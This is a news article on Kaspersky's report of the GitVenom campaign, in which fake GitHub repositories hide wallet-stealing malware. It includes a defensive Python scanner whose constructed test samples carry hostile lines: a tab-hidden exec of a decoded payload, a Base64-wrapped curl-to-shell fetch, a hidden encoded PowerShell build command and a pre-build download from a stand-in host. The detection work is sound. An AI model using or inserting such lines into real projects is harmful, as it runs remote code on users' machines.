Hackers Use GitHub Repositories to Target Crypto Wallets


Cybercriminals are using GitHub to spread malware disguised as useful software. Security researchers at Kaspersky have documented a campaign, which they call GitVenom, in which the attackers created hundreds of fake repositories.

Fake GitHub Repositories Are Stealing Crypto Wallets

These repositories claim to offer tools for social media automation, crypto wallet management, and game cheats. They do not do what they promise. Instead, the projects contain hidden code that downloads additional malware and targets crypto wallets. The attackers dressed the repositories up as legitimate open-source projects, tricking developers into building and running them.

The malicious code appears in Python, JavaScript, C, C++, and C# projects. In Python, the attackers push the malicious statement off-screen behind a long run of tab characters; when executed, it installs cryptography libraries and decrypts an embedded payload. JavaScript projects carry a Base64-encoded script that is decoded and executed at run time. In C, C++ and C# projects, the malware is embedded in Visual Studio project files so that it runs when the project is built.

According to Kaspersky's report, once activated, these payloads steal login credentials, crypto wallet data, and browsing history, and exfiltrate the stolen data to the attackers over Telegram. Some repositories also deploy remote access tools such as AsyncRAT and the Quasar backdoor, which give the attackers remote control of infected systems. A clipboard hijacker watches for copied crypto wallet addresses and silently replaces them with addresses controlled by the attackers, so victims unknowingly send funds to the wrong wallet.

Open-Source Risks and How to Stay Safe

Notably, this style of attack is not new. GitVenom itself has been running for at least two years, judging by the oldest repositories. Kaspersky's telemetry shows that most infection attempts have been detected in Russia, Brazil, and Turkey.

The issue is that open-source platforms, while helpful, can also be dangerous. Attackers manipulate repositories to appear legitimate, tricking developers into trusting them. Kaspersky urges developers to examine a GitHub repository thoroughly before building or running anything from it.

One primary concern is how attackers use artificial intelligence to make their fake repositories seem real. They pad commit histories, generate detailed README files, and even fabricate reviews. Developers should be wary of repositories with overly polished descriptions, repetitive phrasing, or other signs of AI-generated content.

The Challenge of Detecting Fake Repositories

Using artificial intelligence to write a README is not suspicious in itself. However, if a repository appears too perfect, further investigation is warranted. Checking for real community engagement, genuine user reviews, and legitimate projects that actually depend on the code can help.

Attackers also create fake reviews and social media posts, however, which makes scams even harder to spot.

The best defense is caution. Developers should analyze repository activity, scan for hidden scripts, and avoid blindly trusting open-source code.
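The techniques described above (code hidden behind long tab runs in Python files, Base64 blobs executed from JavaScript, and build-time commands in Visual Studio project files) are simple enough to look for mechanically. The script below is an added example, not Kaspersky's tooling or anything from the GitVenom repositories: it scans a checkout for those three indicators. The sample files it checks are constructed for the example, and the thresholds and keyword lists are assumptions chosen for illustration, not Kaspersky's detection rules.

```python
import base64
import binascii
import re
from pathlib import Path

# Heuristics for the three lure styles the article describes. Thresholds
# (16 tabs, 64 Base64 characters) and the keyword lists are assumptions
# made for this example; tune them for your own repositories.
TAB_RUN = re.compile(r"\t{16,}\S")
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{64,}={0,2})['\"]")
JS_EXEC = re.compile(r"\b(eval|Function|child_process|execSync|spawn)\b")
VS_EVENT = re.compile(r"<(PreBuildEvent|PostBuildEvent)>(.*?)</\1>", re.I | re.S)
VS_EXEC = re.compile(r"<Exec\b([^>]*)/?>", re.I)
SUSPECT_CMD = re.compile(
    r"(powershell|cmd(\.exe)?\s*/c|curl|wget|Invoke-WebRequest|-enc\b|certutil)", re.I)


def scan_python(text):
    """Flag lines where a statement sits off-screen after a long run of tabs."""
    return [(n, "code hidden behind long tab run")
            for n, line in enumerate(text.splitlines(), 1) if TAB_RUN.search(line)]


def scan_javascript(text):
    """Flag long Base64 literals that decode to executable code or sit next to eval/Function."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = B64_LITERAL.search(line)
        if not m:
            continue
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not Base64 after all (a hash, a key, an opaque token)
        if JS_EXEC.search(line) or JS_EXEC.search(decoded):
            hits.append((n, f"Base64 payload executed: {decoded[:60]!r}"))
    return hits


def scan_vsproject(text):
    """Flag build-time commands (PreBuildEvent/PostBuildEvent/<Exec>) that look like droppers."""
    hits = []
    for m in list(VS_EVENT.finditer(text)) + list(VS_EXEC.finditer(text)):
        cmd = m.group(2) if m.re is VS_EVENT else m.group(1)
        if SUSPECT_CMD.search(cmd):
            line = text.count("\n", 0, m.start()) + 1
            hits.append((line, f"build-time command: {cmd.strip()[:60]!r}"))
    return hits


SCANNERS = {".py": scan_python, ".js": scan_javascript,
            ".csproj": scan_vsproject, ".vcxproj": scan_vsproject, ".targets": scan_vsproject}


def scan_text(name, text):
    """Dispatch on file extension; files of other types are ignored."""
    scanner = SCANNERS.get(Path(name).suffix.lower())
    return scanner(text) if scanner else []


def scan_tree(root):
    """Walk a checkout and return {path: [(line, reason), ...]} for every file with findings."""
    findings = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in SCANNERS:
            hits = scan_text(p.name, p.read_text(errors="replace"))
            if hits:
                findings[str(p)] = hits
    return findings


# Constructed samples, one per lure style (not taken from any real repository).
SAMPLE_PY = (
    "import requests\n"
    "\n"
    "def fetch(url):\n"
    "    return requests.get(url).text" + "\t" * 40
    + "exec(__import__('base64').b64decode(PAYLOAD))\n"
)
HIDDEN_JS = "require('child_process').exec('curl -s http://example.invalid/x | sh')"
SAMPLE_JS = (
    "const cfg = require('./config');\n"
    f"const p = \"{base64.b64encode(HIDDEN_JS.encode()).decode()}\";\n"
    "eval(Buffer.from(p, 'base64').toString());\n"
)
SAMPLE_CSPROJ = """<Project>
  <Target Name="Build">
    <Exec Command="powershell -w hidden -enc QQBBAEEA" />
  </Target>
  <PropertyGroup>
    <PreBuildEvent>curl -s http://example.invalid/u.exe -o %TEMP%\\u.exe</PreBuildEvent>
  </PropertyGroup>
</Project>
"""


def demo():
    """Run the scanners over the constructed samples; each should produce at least one finding."""
    samples = {"bot.py": SAMPLE_PY, "index.js": SAMPLE_JS, "Bot.csproj": SAMPLE_CSPROJ}
    return {name: scan_text(name, text) for name, text in samples.items()}


if __name__ == "__main__":
    for name, hits in demo().items():
        for line, reason in hits:
            print(f"{name}:{line}: {reason}")
```

Point `scan_tree()` at a fresh clone before you build or run anything from it. A hit is a reason to read the file, not proof of malice: legitimate projects do run build steps and do embed Base64 data, so the value of the scan is that it surfaces exactly the spots a casual reviewer scrolling through GitHub's web view would never see.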

Meanwhile, this development comes at a pivotal moment for the crypto market: over $1.4B was stolen in the Bybit heist, which has been attributed to the Lazarus Group.

In related news, Microsoft Threat Intelligence has discovered a new XCSSET malware variant targeting cryptocurrency wallets on Apple macOS devices. 

March 15, 2025